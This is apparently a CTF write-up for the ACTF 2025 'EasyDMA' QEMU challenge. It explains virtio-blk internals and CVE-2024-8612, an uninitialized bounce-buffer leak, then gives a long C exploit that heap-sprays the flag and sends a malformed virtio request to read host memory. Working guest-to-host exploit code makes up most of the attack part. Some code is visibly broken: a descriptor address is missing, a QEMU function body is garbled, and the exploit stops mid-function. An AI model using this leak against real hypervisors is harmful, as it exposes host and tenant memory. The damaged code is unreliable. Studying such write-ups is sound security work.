QEMU PWN - EasyDMA
EasyDMA
From: ACTF 2025
题目给出一个去符号的 qemu 二进制文件
qemu-system-x86_64
,启动参数如下
timeout --foreground 300 ./qemu-system-x86_64 \
-L pc-bios \
-m 1024 \
-kernel bzImage \
-initrd rootfs.cpio \
-drive file=null-co://,if=none,id=mydisk \
-device virtio-blk-pci,drive=mydisk,ioeventfd=off \
-device readflag \
-append "priority=low console=ttyS0" \
-monitor /dev/null \
-nographic
添加两个设备 virtio-blk-pci
, readflag
。
反汇编可以找到 readflag
通过 mmio
的读、写回调函数:
__int64 __fastcall readflag_mmio_read(__int64 opaque, unsigned __int64 addr, int size)
{
__int64 result; // rax
if ( addr > 0x7F )
{
result = -1LL;
if ( size != 4 )
return result;
}
else if ( size != 4 )
{
result = -1LL;
if ( size != 8 )
return result;
}
result = 0xDEADBEEFLL;
if ( addr )
{
if ( addr == 8 )
return *(_QWORD *)(opaque + 2984);
else
return -1LL;
}
return result;
}
void __fastcall readflag_mmio_write(__int64 opaque, unsigned __int64 addr, size_t val, int size)
{
void *v4; // rbp
FILE *v5; // rax
FILE *v6; // r12
size_t v7; // rax
int v8; // [rsp+0h] [rbp-20h]
if ( addr > 0x7F )
{
if ( size != 4 )
return;
}
else if ( size != 4 )
{
if ( size == 8 && addr == 8 )
goto LABEL_6;
return;
}
if ( addr )
{
if ( addr == 8 )
LABEL_6:
*(_QWORD *)(opaque + 2984) = val;
}
else if ( val <= 0xFFF )
{
v8 = val;
v4 = malloc(val);
if ( v4 )
{
v5 = fopen64("flag", "r");
v6 = v5;
if ( v5 )
{
v7 = fread(v4, 1uLL, (unsigned int)(v8 - 1), v5);
if ( v7 )
*((_BYTE *)v4 + v7) = 0;
else
puts("No data read from the file.");
free(v4);
fclose(v6);
}
else
{
perror("Error opening file");
free(v4);
}
}
else
{
perror("Memory allocation failed");
}
}
}
Virtio Block Device1
Data types definition
For the integer data types used in the structure definitions, the following conventions are used:
u8, u16, u32, u64
An unsigned integer of the specified length in bits.
le16, le32, le64
An unsigned integer of the specified length in bits, in little-endian byte order.
PCI Capabilities
struct virtio_pci_cap {
u8 cap_vndr; /* Generic PCI field: PCI_CAP_ID_VNDR */
u8 cap_next; /* Generic PCI field: next ptr. */
u8 cap_len; /* Generic PCI field: capability length */
u8 cfg_type; /* Identifies the structure. */
u8 bar; /* Where to find it. */
u8 id; /* Multiple capabilities of the same type */
u8 padding[2]; /* Pad to full dword. */
le32 offset; /* Offset within bar. */
le32 length; /* Length of the structure, in bytes. */
};
cfg_type identifies the structure, according to the following table:
/* Common configuration */
/* Notifications */
/* ISR Status */
/* Device specific configuration */
/* PCI configuration access */
/* Shared memory region */
/* Vendor-specific data */
For common configuration, its layout is below:
struct virtio_pci_common_cfg {
/* About the whole device. */
le32 device_feature_select; /* read-write */
le32 device_feature; /* read-only for driver */
le32 driver_feature_select; /* read-write */
le32 driver_feature; /* read-write */
le16 config_msix_vector; /* read-write */
le16 num_queues; /* read-only for driver */
u8 device_status; /* read-write */
u8 config_generation; /* read-only for driver */
/* About a specific virtqueue. */
le16 queue_select; /* read-write */
le16 queue_size; /* read-write */
le16 queue_msix_vector; /* read-write */
le16 queue_enable; /* read-write */
le16 queue_notify_off; /* read-only for driver */
le64 queue_desc; /* read-write */
le64 queue_driver; /* read-write */
le64 queue_device; /* read-write */
le16 queue_notif_config_data; /* read-only for driver */
le16 queue_reset; /* read-write */
/* About the administration virtqueue. */
le16 admin_queue_index; /* read-only for driver */
le16 admin_queue_num; /* read-only for driver */
};
For notification, its layout is below:
struct virtio_pci_notify_cap {
struct virtio_pci_cap cap;
le32 notify_off_multiplier; /* Multiplier for queue_notify_off. */
};
We recognize these type, and record the offset.
void print_cap(struct virtio_pci_cap* cap){
printf("cap_len: %x\n", cap->cap_len);
switch(cap->cfg_type){
case VIRTIO_PCI_CAP_COMMON_CFG:
printf("cfg_type: common\n");
break;
case VIRTIO_PCI_CAP_NOTIFY_CFG:
printf("cfg_type: notify\n");
break;
case VIRTIO_PCI_CAP_ISR_CFG:
printf("cfg_type: isr\n");
break;
case VIRTIO_PCI_CAP_DEVICE_CFG:
printf("cfg_type: device\n");
break;
case VIRTIO_PCI_CAP_PCI_CFG:
printf("cfg_type: pci\n");
break;
case VIRTIO_PCI_CAP_SHARED_MEMORY:
printf("cfg_type: shared memory\n");
break;
case VIRTIO_PCI_CAP_VENDOR_CFG:
printf("cfg_type: vendor\n");
break;
default:
printf("cfg_type: unknown\n");
break;
}
printf("bar: %x\n", cap->bar);
printf("id: %x\n", cap->id);
printf("offset: %x\n", cap->offset);
printf("length: %x\n", cap->length);
}
switch(cap.cfg_type){
case VIRTIO_PCI_CAP_COMMON_CFG:
virtio_common_mmio = virtio_mmio + cap.offset;
break;
case VIRTIO_PCI_CAP_NOTIFY_CFG:
virtio_notify_mmio = (struct virtio_notify_cfg*)((size_t)virtio_mmio + cap.offset);
break;
case VIRTIO_PCI_CAP_ISR_CFG:
virtio_isr_mmio = virtio_mmio + cap.offset;
break;
case VIRTIO_PCI_CAP_DEVICE_CFG:
virtio_device_mmio = virtio_mmio + cap.offset;
break;
default:
break;
}
Virtqueue2
The mechanism for bulk data transport on virtio devices is pretentiously called a virtqueue. Each device can have zero or more virtqueues.
Each virtqueue can consist of up to 3 parts:
• Descriptor Area - used for describing buffers
• Driver Area - extra data supplied by driver to the device. Also called avail virtqueue.
• Device Area - extra data supplied by device to driver. Also called used virtqueue.

There areas structure defined below:
struct virtq_desc {
/* Address (guest-physical). */
le64 addr;
/* Length. */
le32 len;
/* This marks a buffer as continuing via the next field. */
/* This marks a buffer as device write-only (otherwise device read-only). */
/* This means the buffer contains a list of buffer descriptors. */
/* The flags as indicated above. */
le16 flags;
/* Next field if flags & NEXT */
le16 next;
};
struct virtq_avail {
le16 flags;
le16 idx;
le16 ring[VIRTIO_QUEUE_SIZE];
le16 used_event; /* Only if VIRTIO_F_EVENT_IDX */
};
struct virtq_used_elem {
/* Index of start of used descriptor chain. */
le32 id;
/*
* The number of bytes written into the device writable portion of
* the buffer described by the descriptor chain.
*/
le32 len;
};
struct virtq_used {
le16 flags;
le16 idx;
struct virtq_used_elem ring[VIRTIO_QUEUE_SIZE];
le16 avail_event; /* Only if VIRTIO_F_EVENT_IDX */
};
The driver queues requests to the virtqueue, the type of the request is either a read (VIRTIO_BLK_T_IN), a write (VIRTIO_BLK_T_OUT), a discard (VIRTIO_BLK_T_DISCARD), a write zeroes (VIRTIO_BLK_T_WRITE_ZEROES) or a flush (VIRTIO_BLK_T_FLUSH).
struct virtio_blk_req {
le32 type;
le32 reserved;
le64 sector;
u8 data[][512];
u8 status;
};
struct virtio_blk_discard_write_zeroes {
le64 sector;
le32 num_sectors;
struct {
le32 unmap:1;
le32 reserved:31;
} flags;
};
MMIO3
Memory-mapped I/O (MMIO) uses the same address space to address both main memory and I/O devices. The memory and registers of the I/O devices are mapped to (associated with) address values, so a memory address may refer to either a portion of physical RAM or to memory and registers of the I/O device.
uint8_t mmio_read8(void* addr){
return *(volatile uint8_t*)addr;
}
uint16_t mmio_read16(void* addr){
return *(volatile uint16_t*)addr;
}
uint32_t mmio_read32(void* addr){
return *(volatile uint32_t*)addr;
}
uint64_t mmio_read64(void* addr){
return *(volatile uint64_t*)addr;
}
void mmio_write8(void* addr, uint8_t val){
*(volatile uint8_t*)addr = val;
}
void mmio_write16(void* addr, uint16_t val){
*(volatile uint16_t*)addr = val;
}
void mmio_write32(void* addr, uint32_t val){
*(volatile uint32_t*)addr = val;
}
void mmio_write64(void* addr, uint64_t val){
*(volatile uint64_t*)addr = val;
}
Device configuration layout
struct virtio_blk_config {
le64 capacity;
le32 size_max;
le32 seg_max;
struct virtio_blk_geometry {
le16 cylinders;
u8 heads;
u8 sectors;
} geometry;
le32 blk_size;
struct virtio_blk_topology {
// # of logical blocks per physical block (log2)
u8 physical_block_exp;
// offset of first aligned logical block
u8 alignment_offset;
// suggested minimum I/O size in blocks
le16 min_io_size;
// optimal (suggested maximum) I/O size in blocks
le32 opt_io_size;
} topology;
u8 writeback;
u8 unused0;
u16 num_queues;
le32 max_discard_sectors;
le32 max_discard_seg;
le32 discard_sector_alignment;
le32 max_write_zeroes_sectors;
le32 max_write_zeroes_seg;
u8 write_zeroes_may_unmap;
u8 unused1[3];
le32 max_secure_erase_sectors;
le32 max_secure_erase_seg;
le32 secure_erase_sector_alignment;
struct virtio_blk_zoned_characteristics {
le32 zone_sectors;
le32 max_open_zones;
le32 max_active_zones;
le32 max_append_sectors;
le32 write_granularity;
u8 model;
u8 unused2[3];
} zoned;
};
Initialization
- Read capabilities
- Reset device
- Reset Virtqueue
void init_virtio() {
int fd = open("/sys/devices/pci0000:00/0000:00:04.0/config", O_RDONLY);
if(fd < 0){
ERR("Open virtio config");
}
struct virtio_pci_cap cap;
char* config = malloc(0x1000);
int bytes_read = read(fd, config, 0x1000);
if(bytes_read < 0){
ERR("Read virtio config");
}
fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource4", O_RDWR | O_SYNC);
if(fd < 0){
ERR("Open virtio resource4");
}
virtio_mmio = mmap(0, 0x4000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
if(virtio_mmio == (volatile void*)-1){
ERR("mmap virtio mem");
}
close(fd);
u8 cap_ptr = *(u8*)(config+0x34);
while(cap_ptr != 0){
if(config[cap_ptr] != 0x9){
cap_ptr = *(u8*)(config+cap_ptr+1);
continue;
}
memcpy(&cap, config+cap_ptr, sizeof(cap));
print_cap(&cap);
switch(cap.cfg_type){
case VIRTIO_PCI_CAP_COMMON_CFG:
virtio_common_mmio = virtio_mmio + cap.offset;
break;
case VIRTIO_PCI_CAP_NOTIFY_CFG:
virtio_notify_mmio = (struct virtio_notify_cfg*)((size_t)virtio_mmio + cap.offset);
break;
case VIRTIO_PCI_CAP_ISR_CFG:
virtio_isr_mmio = virtio_mmio + cap.offset;
break;
case VIRTIO_PCI_CAP_DEVICE_CFG:
virtio_device_mmio = virtio_mmio + cap.offset;
break;
default:
break;
}
cap_ptr = cap.cap_next;
}
close(fd);
free(config);
struct virtio_pci_common_cfg* common_cfg = (struct virtio_pci_common_cfg*)virtio_common_mmio;
mmio_write32(&common_cfg->device_feature_select, 0);
printf("device_feature[0]: %x\n", mmio_read32(&common_cfg->device_feature));
mmio_write32(&common_cfg->device_feature_select, 1);
printf("device_feature[1]: %x\n", mmio_read32(&common_cfg->device_feature));
mmio_write32(&common_cfg->driver_feature_select, 0);
printf("driver_feature[0]: %x\n", mmio_read32(&common_cfg->driver_feature));
mmio_write32(&common_cfg->driver_feature_select, 1);
printf("driver_feature[1]: %x\n", mmio_read32(&common_cfg->driver_feature));
struct virtio_blk_config* blk_cfg = (struct virtio_blk_config*)virtio_device_mmio;
printf("capacity: %lx\n", mmio_read64(&blk_cfg->capacity));
printf("size_max: %x\n", mmio_read32(&blk_cfg->size_max));
printf("seg_max: %x\n", mmio_read32(&blk_cfg->seg_max));
printf("geometry.cylinders: %x\n", mmio_read16(&blk_cfg->geometry.cylinders));
printf("geometry.heads: %x\n", mmio_read8(&blk_cfg->geometry.heads));
printf("geometry.sectors: %x\n", mmio_read8(&blk_cfg->geometry.sectors));
printf("blk_size: %x\n", mmio_read32(&blk_cfg->blk_size));
// reset device
mmio_write8(&common_cfg->device_status, 0);
mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_ACKNOWLEDGE);
mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
mmio_write32(&common_cfg->driver_feature_select, 0);
mmio_write32(&common_cfg->driver_feature, 0); // disable all features
mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
assert(mmio_read8(&common_cfg->device_status) & VIRTIO_CONFIG_S_FEATURES_OK);
// alloc dma memory
int dma_fd = open("/dev/mem", O_RDWR | O_SYNC);
if(dma_fd < 0){
ERR("Open dma");
}
dma_mem = mmap((void*)0x3ffdd000, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED, dma_fd, 0x3ffdd000);
if(dma_mem == (volatile void*)-1){
ERR("mmap dma mem");
}
*(volatile uint32_t*)dma_mem = 0x12345678;
printf("%x\n", *(volatile uint32_t*)dma_mem);
*(volatile uint32_t*)dma_mem = 0;
printf("dma_mem: %p\n", dma_mem);
dma_data = dma_mem + 0x1000;
queue_desc = (struct virtq_desc*)dma_mem;
queue_avail = (struct virtq_avail*)((char*)queue_desc + 0x10 * VIRTIO_QUEUE_SIZE);
queue_used = (struct virtq_used*)((char*)dma_mem + 0x200);
// init queue
mmio_write16(&common_cfg->queue_select, 0);
mmio_write16(&common_cfg->queue_size, VIRTIO_QUEUE_SIZE);
mmio_write64(&common_cfg->queue_desc, (size_t)0x3ffdd000);
mmio_write64(&common_cfg->queue_driver, (size_t)0x3ffdd100);
mmio_write64(&common_cfg->queue_device, (size_t)0x3ffdd200);
mmio_write16(&common_cfg->queue_enable, 1);
mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER_OK | VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
puts("virtio init done");
}
Vulnerabilities
CVE-2024-8612
从文件的字符串中可得知 qemu 的版本号为 qemu-8.0.0-rc2
,存在一个关于 virtio-blk-pci
的信息泄漏漏洞:
CVE-2024-8612
具体利用还可以参考:
HEXACON2024 - DMAKiller: DMA to Escape from QEMU/KVM by Yongkang Jia, Yiming Tao & Xiao Lei,
当 DMA 访问的地址是 MMIO 的,会使用 bounce buffer
/* Map a physical memory region into a host virtual address.
* May map a subset of the requested range, given by and returned in *plen.
* May return NULL if resources needed to perform the mapping are exhausted.
* Use only for reads OR writes - not for read-modify-write operations.
* Use cpu_register_map_client() to know when retrying the map operation is
* likely to succeed.
*/
void *address_space_map(AddressSpace *as,
hwaddr addr,
hwaddr *plen,
bool is_write,
MemTxAttrs attrs)
{
hwaddr len = *plen;
hwaddr l, xlat;
MemoryRegion *mr;
FlatView *fv;
if (len == 0) {
return NULL;
}
l = len;
RCU_READ_LOCK_GUARD();
fv = address_space_to_flatview(as);
mr = flatview_translate(fv, addr, &xlat, &l, is_write, attrs);
if (!memory_access_is_direct(mr, is_write)) {
if (qatomic_xchg(&bounce.in_use, true)) {
*plen = 0;
return NULL;
}
/* Avoid unbounded allocations */
l = MIN(l, TARGET_PAGE_SIZE);
bounce.buffer = qemu_memalign(TARGET_PAGE_SIZE, l);
bounce.addr = addr;
bounce.len = l;
memory_region_ref(mr);
bounce.mr = mr;
if (!is_write) {
flatview_read(fv, addr, MEMTXATTRS_UNSPECIFIED,
bounce.buffer, l);
}
*plen = l;
return bounce.buffer;
}
//...
}
同时,通过 qemu_memalign
得到的内存并没有初始化。
static int virtio_blk_handle_request(VirtIOBlockReq *req, MultiReqBuffer *mrb)
{
uint32_t type;
struct iovec *in_iov = req->elem.in_sg;
struct iovec *out_iov = req->elem.out_sg;
unsigned in_num = req->elem.in_num;
unsigned out_num = req->elem.out_num;
VirtIOBlock *s = req->dev;
VirtIODevice *vdev = VIRTIO_DEVICE(s);
if (req->elem.out_num < 1 || req->elem.in_num < 1) {
virtio_error(vdev, "virtio-blk missing headers");
return -1;
}
if (unlikely(iov_to_buf(out_iov, out_num, 0, &req->out,
sizeof(req->out)) != sizeof(req->out))) {
virtio_error(vdev, "virtio-blk request outhdr too short");
return -1;
}
iov_discard_front_undoable(&out_iov, &out_num, sizeof(req->out),
&req->outhdr_undo);
if (in_iov[in_num - 1].iov_len < sizeof(struct virtio_blk_inhdr)) {
virtio_error(vdev, "virtio-blk request inhdr too short");
iov_discard_undo(&req->outhdr_undo);
return -1;
}
//...
req->in_len = iov_size(in_iov, in_num);
//...
case VIRTIO_BLK_T_IN:
{
bool is_write = type & VIRTIO_BLK_T_OUT;
req->sector_num = virtio_ldq_p(vdev, &req->out.sector);
if (is_write) {
qemu_iovec_init_external(&req->qiov, out_iov, out_num);
trace_virtio_blk_handle_write(vdev, req, req->sector_num,
req->qiov.size / BDRV_SECTOR_SIZE);
} else {
qemu_iovec_init_external(&req->qiov, in_iov, in_num);
trace_virtio_blk_handle_read(vdev, req, req->sector_num,
req->qiov.size / BDRV_SECTOR_SIZE);
}
if (!virtio_blk_sect_range_ok(s, req->sector_num, req->qiov.size)) {
virtio_blk_req_complete(req, VIRTIO_BLK_S_IOERR);
block_acct_invalid(blk_get_stats(s->blk),
is_write ? BLOCK_ACCT_WRITE : BLOCK_ACCT_READ);
virtio_blk_free_request(req);
return 0;
}
//...
default:
virtio_blk_req_complete(req, VIRTIO_BLK_S_UNSUPP);
virtio_blk_free_request(req);
}
在 virtio_blk_handle_request
,即使请求不合法,长度也被写入到 req->in_len
。type
不合法时,直接调用 virtio_blk_req_complete
调用链:virtio_blk_handle_request->virtio_blk_req_complete->virtqueue_push->virtqueue_fill->virtqueue_unmap_sg->dma_memory_unmap->address_space_unmap->address_space_write
MemTxResult address_space_write(AddressSpace *as, hwaddr addr,
MemTxAttrs attrs,
const void *buf, int len)
{
MemTxResult result;
__bufread(buf, len);
return result;
}
由于缺乏保护,数据可以被写到 Common configuration 部分,并且部分空间可被读出。
Exploit
通过堆喷,将 flag 字符串填充在内存中。利用上述漏洞读出内存内容。
struct virtio_pci_cap {
u8 cap_vndr;
u8 cap_next;
u8 cap_len;
u8 cfg_type;
u8 bar;
u8 id;
u8 padding[2];
le32 offset;
le32 length;
};
struct virtio_pci_common_cfg {
/* About the whole device. */
le32 device_feature_select; /* read-write */
le32 device_feature; /* read-only for driver */
le32 driver_feature_select; /* read-write */
le32 driver_feature; /* read-write */
le16 config_msix_vector; /* read-write */
le16 num_queues; /* read-only for driver */
u8 device_status; /* read-write */
u8 config_generation; /* read-only for driver */
/* About a specific virtqueue. */
le16 queue_select; /* read-write */
le16 queue_size; /* read-write */
le16 queue_msix_vector; /* read-write */
le16 queue_enable; /* read-write */
le16 queue_notify_off; /* read-only for driver */
le64 queue_desc; /* read-write */
le64 queue_driver; /* read-write */
le64 queue_device; /* read-write */
le16 queue_notify_data; /* read-only for driver */
le16 queue_reset; /* read-write */
};
struct virtio_notify_cfg {
struct virtio_pci_cap cap;
le32 notify_off_multiplier;
};
struct virtio_blk_config{
le64 capacity;
le32 size_max;
le32 seg_max;
struct virtio_blk_geometry {
le16 cylinders;
u8 heads;
u8 sectors;
} geometry;
le32 blk_size;
struct virtio_blk_topology {
// # of logical blocks per physical block (log2)
u8 physical_block_exp;
// offset of first aligned logical block
u8 alignment_offset;
// suggested minimum I/O size in blocks
le16 min_io_size;
// optimal (suggested maximum) I/O size in blocks
le32 opt_io_size;
} topology;
u8 writeback;
u8 unused0;
u16 num_queues;
le32 max_discard_sectors;
le32 max_discard_seg;
le32 discard_sector_alignment;
le32 max_write_zeroes_sectors;
le32 max_write_zeroes_seg;
u8 write_zeroes_may_unmap;
u8 unused1[3];
le32 max_secure_erase_sectors;
le32 max_secure_erase_seg;
le32 secure_erase_sector_alignment;
};
enum virtio_pci_cfg_type{
VIRTIO_PCI_CAP_COMMON_CFG = 0x1,
VIRTIO_PCI_CAP_NOTIFY_CFG = 0x2,
VIRTIO_PCI_CAP_ISR_CFG = 0x3,
VIRTIO_PCI_CAP_DEVICE_CFG = 0x4,
VIRTIO_PCI_CAP_PCI_CFG = 0x5,
VIRTIO_PCI_CAP_SHARED_MEMORY = 0x8,
VIRTIO_PCI_CAP_VENDOR_CFG = 0x9,
};
/* Feature bits */
/* Status byte for guest to report progress, and synchronize features. */
/* We have seen device and processed generic fields (VIRTIO_CONFIG_F_VIRTIO) */
/* We have found a driver for the device. */
/* Driver has used its parts of the config, and is happy */
/* Driver has finished configuring features */
/* Device entered invalid state, driver must reset it */
/* We've given up on this device. */
struct virtq_desc {
/* Address (guest-physical). */
le64 addr;
/* Length. */
le32 len;
/* This marks a buffer as continuing via the next field. */
/* This marks a buffer as device write-only (otherwise device read-only). */
/* This means the buffer contains a list of buffer descriptors. */
/* The flags as indicated above. */
le16 flags;
/* Next field if flags & NEXT */
le16 next;
};
struct virtq_avail {
le16 flags;
le16 idx;
le16 ring[VIRTIO_QUEUE_SIZE];
le16 used_event; /* Only if VIRTIO_F_EVENT_IDX */
};
struct virtq_used_elem {
/* Index of start of used descriptor chain. */
le32 id;
/*
* The number of bytes written into the device writable portion of
* the buffer described by the descriptor chain.
*/
le32 len;
};
struct virtq_used {
le16 flags;
le16 idx;
struct virtq_used_elem ring[VIRTIO_QUEUE_SIZE];
le16 avail_event; /* Only if VIRTIO_F_EVENT_IDX */
};
struct virtio_blk_req {
le32 type;
le32 reserved;
le64 sector;
u8 data[0];
// u8 status;
};
void print_cap(struct virtio_pci_cap* cap){
printf("cap_len: %x\n", cap->cap_len);
switch(cap->cfg_type){
case VIRTIO_PCI_CAP_COMMON_CFG:
printf("cfg_type: common\n");
break;
case VIRTIO_PCI_CAP_NOTIFY_CFG:
printf("cfg_type: notify\n");
break;
case VIRTIO_PCI_CAP_ISR_CFG:
printf("cfg_type: isr\n");
break;
case VIRTIO_PCI_CAP_DEVICE_CFG:
printf("cfg_type: device\n");
break;
case VIRTIO_PCI_CAP_PCI_CFG:
printf("cfg_type: pci\n");
break;
case VIRTIO_PCI_CAP_SHARED_MEMORY:
printf("cfg_type: shared memory\n");
break;
case VIRTIO_PCI_CAP_VENDOR_CFG:
printf("cfg_type: vendor\n");
break;
default:
printf("cfg_type: unknown\n");
break;
}
printf("bar: %x\n", cap->bar);
printf("id: %x\n", cap->id);
printf("offset: %x\n", cap->offset);
printf("length: %x\n", cap->length);
}
void ERR(const char* buf){
perror(buf);
abort();
}
void LOG(const char* buf){
write(2, buf, strlen(buf));
}
volatile char* readflag_mmio = NULL;
volatile char* virtio_mmio = NULL;
volatile char* virtio_common_mmio = NULL;
volatile struct virtio_notify_cfg* virtio_notify_mmio = NULL;
volatile char* virtio_isr_mmio = NULL;
volatile char* virtio_device_mmio = NULL;
volatile char* dma_mem = NULL;
volatile char* dma_data = NULL;
volatile struct virtq_desc* queue_desc = NULL;
volatile struct virtq_avail* queue_avail = NULL;
volatile struct virtq_used* queue_used = NULL;
void init_readflag(){
int mmio_fd = open("/sys/devices/pci0000:00/0000:00:05.0/resource0", O_RDWR | O_SYNC);
if(mmio_fd < 0){
ERR("Open readflag");
}
readflag_mmio = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
if(readflag_mmio == (volatile void*)-1){
ERR("mmap mmio_mem");
}
close(mmio_fd);
puts("readflag init done");
}
uint8_t mmio_read8(void* addr){
return *(volatile uint8_t*)addr;
}
uint16_t mmio_read16(void* addr){
return *(volatile uint16_t*)addr;
}
uint32_t mmio_read32(void* addr){
return *(volatile uint32_t*)addr;
}
uint64_t mmio_read64(void* addr){
return *(volatile uint64_t*)addr;
}
void mmio_write8(void* addr, uint8_t val){
*(volatile uint8_t*)addr = val;
}
void mmio_write16(void* addr, uint16_t val){
*(volatile uint16_t*)addr = val;
}
void mmio_write32(void* addr, uint32_t val){
*(volatile uint32_t*)addr = val;
}
void mmio_write64(void* addr, uint64_t val){
*(volatile uint64_t*)addr = val;
}
void mb(){
asm volatile("mfence":::"memory");
}
void init_virtio() {
int fd = open("/sys/devices/pci0000:00/0000:00:04.0/config", O_RDONLY);
if(fd < 0){
ERR("Open virtio config");
}
struct virtio_pci_cap cap;
char* config = malloc(0x1000);
int bytes_read = read(fd, config, 0x1000);
if(bytes_read < 0){
ERR("Read virtio config");
}
fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource4", O_RDWR | O_SYNC);
if(fd < 0){
ERR("Open virtio resource4");
}
virtio_mmio = mmap(0, 0x4000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
if(virtio_mmio == (volatile void*)-1){
ERR("mmap virtio mem");
}
close(fd);
u8 cap_ptr = *(u8*)(config+0x34);
while(cap_ptr != 0){
if(config[cap_ptr] != 0x9){
cap_ptr = *(u8*)(config+cap_ptr+1);
continue;
}
memcpy(&cap, config+cap_ptr, sizeof(cap));
print_cap(&cap);
switch(cap.cfg_type){
case VIRTIO_PCI_CAP_COMMON_CFG:
virtio_common_mmio = virtio_mmio + cap.offset;
break;
case VIRTIO_PCI_CAP_NOTIFY_CFG:
virtio_notify_mmio = (struct virtio_notify_cfg*)((size_t)virtio_mmio + cap.offset);
break;
case VIRTIO_PCI_CAP_ISR_CFG:
virtio_isr_mmio = virtio_mmio + cap.offset;
break;
case VIRTIO_PCI_CAP_DEVICE_CFG:
virtio_device_mmio = virtio_mmio + cap.offset;
break;
default:
break;
}
cap_ptr = cap.cap_next;
}
close(fd);
free(config);
struct virtio_pci_common_cfg* common_cfg = (struct virtio_pci_common_cfg*)virtio_common_mmio;
mmio_write32(&common_cfg->device_feature_select, 0);
printf("device_feature[0]: %x\n", mmio_read32(&common_cfg->device_feature));
mmio_write32(&common_cfg->device_feature_select, 1);
printf("device_feature[1]: %x\n", mmio_read32(&common_cfg->device_feature));
mmio_write32(&common_cfg->driver_feature_select, 0);
printf("driver_feature[0]: %x\n", mmio_read32(&common_cfg->driver_feature));
mmio_write32(&common_cfg->driver_feature_select, 1);
printf("driver_feature[1]: %x\n", mmio_read32(&common_cfg->driver_feature));
struct virtio_blk_config* blk_cfg = (struct virtio_blk_config*)virtio_device_mmio;
printf("capacity: %lx\n", mmio_read64(&blk_cfg->capacity));
printf("size_max: %x\n", mmio_read32(&blk_cfg->size_max));
printf("seg_max: %x\n", mmio_read32(&blk_cfg->seg_max));
printf("geometry.cylinders: %x\n", mmio_read16(&blk_cfg->geometry.cylinders));
printf("geometry.heads: %x\n", mmio_read8(&blk_cfg->geometry.heads));
printf("geometry.sectors: %x\n", mmio_read8(&blk_cfg->geometry.sectors));
printf("blk_size: %x\n", mmio_read32(&blk_cfg->blk_size));
// reset device
mmio_write8(&common_cfg->device_status, 0);
mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_ACKNOWLEDGE);
mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
mmio_write32(&common_cfg->driver_feature_select, 0);
mmio_write32(&common_cfg->driver_feature, 0); // disable all features
mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
assert(mmio_read8(&common_cfg->device_status) & VIRTIO_CONFIG_S_FEATURES_OK);
// alloc dma memory
int dma_fd = open("/dev/mem", O_RDWR | O_SYNC);
if(dma_fd < 0){
ERR("Open dma");
}
dma_mem = mmap((void*)0x3ffdd000, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED, dma_fd, 0x3ffdd000);
if(dma_mem == (volatile void*)-1){
ERR("mmap dma mem");
}
*(volatile uint32_t*)dma_mem = 0x12345678;
printf("%x\n", *(volatile uint32_t*)dma_mem);
*(volatile uint32_t*)dma_mem = 0;
printf("dma_mem: %p\n", dma_mem);
dma_data = dma_mem + 0x1000;
queue_desc = (struct virtq_desc*)dma_mem;
queue_avail = (struct virtq_avail*)((char*)queue_desc + 0x10 * VIRTIO_QUEUE_SIZE);
queue_used = (struct virtq_used*)((char*)dma_mem + 0x200);
// init queue
mmio_write16(&common_cfg->queue_select, 0);
mmio_write16(&common_cfg->queue_size, VIRTIO_QUEUE_SIZE);
mmio_write64(&common_cfg->queue_desc, (size_t)0x3ffdd000);
mmio_write64(&common_cfg->queue_driver, (size_t)0x3ffdd100);
mmio_write64(&common_cfg->queue_device, (size_t)0x3ffdd200);
mmio_write16(&common_cfg->queue_enable, 1);
mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER_OK | VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
puts("virtio init done");
}
void spray(){
for(int i = 0xfff; i > 0x28; i-=4){
mmio_write32((void*)readflag_mmio, i);
}
}
void hexdump(void* addr, size_t size){
// dump 4 bytes per time
for(int i = 0; i < size; i+=4){
uint32_t val = *(volatile uint32_t*)(addr+i);
for(int j = 0; j < 4; j++){
uint8_t chr = (val >> (j*8)) & 0xff;
if(chr >= 0x20 && chr <= 0x7e){
putchar(chr);
}else{
putchar('?');
}
}
}
}
int main(){
setbuf(stdout, NULL);
init_readflag();
init_virtio();
volatile struct virtio_blk_req* req = (struct virtio_blk_req*)dma_data;
req->type = 0xffffffffu;
req->sector = 0;
req->reserved = 0;
queue_desc[0].addr = (size_t)req;
queue_desc[0].len = 0x10;
queue_desc[0].flags = VIRTQ_DESC_F_NEXT;
queue_desc[0].next = 1;
queue_desc[1].addr = (size_t);
queue_desc[1].len = 0xfff;
queue_desc[1].flags = VIRTQ_DESC_F_WRITE | VIRTQ_DESC_F_NEXT;
queue_desc[1].next = 2;
queue_desc[2].addr = (size_t)dma_data + 0xa00;
queue_desc[2].len = 1;
queue_desc[2].flags = VIRTQ_DESC_F_WRITE;
queue_desc[2].next = 0;
queue_avail->flags = 1;
queue_avail->ring[0] = 0;
queue_avail->idx = 1;
mb();
mmio_write8((void*)virtio_isr_mmio, 1);
struct virtio_pci_common_cfg* common_cfg = (struct virtio_pci_common_cfg*)virtio_common_mmio;
void* notify_addr = (void*)((uintptr_t)virtio_notify_mmio + mmio_read32((void*)&virtio_notify_mmio->cap.offset) + mmio_read16(&common_cfg->queue_notify_off) * mmio_read32((void*)&virtio_notify_mmio->notify_off_multiplier));
puts("--------------------------------");
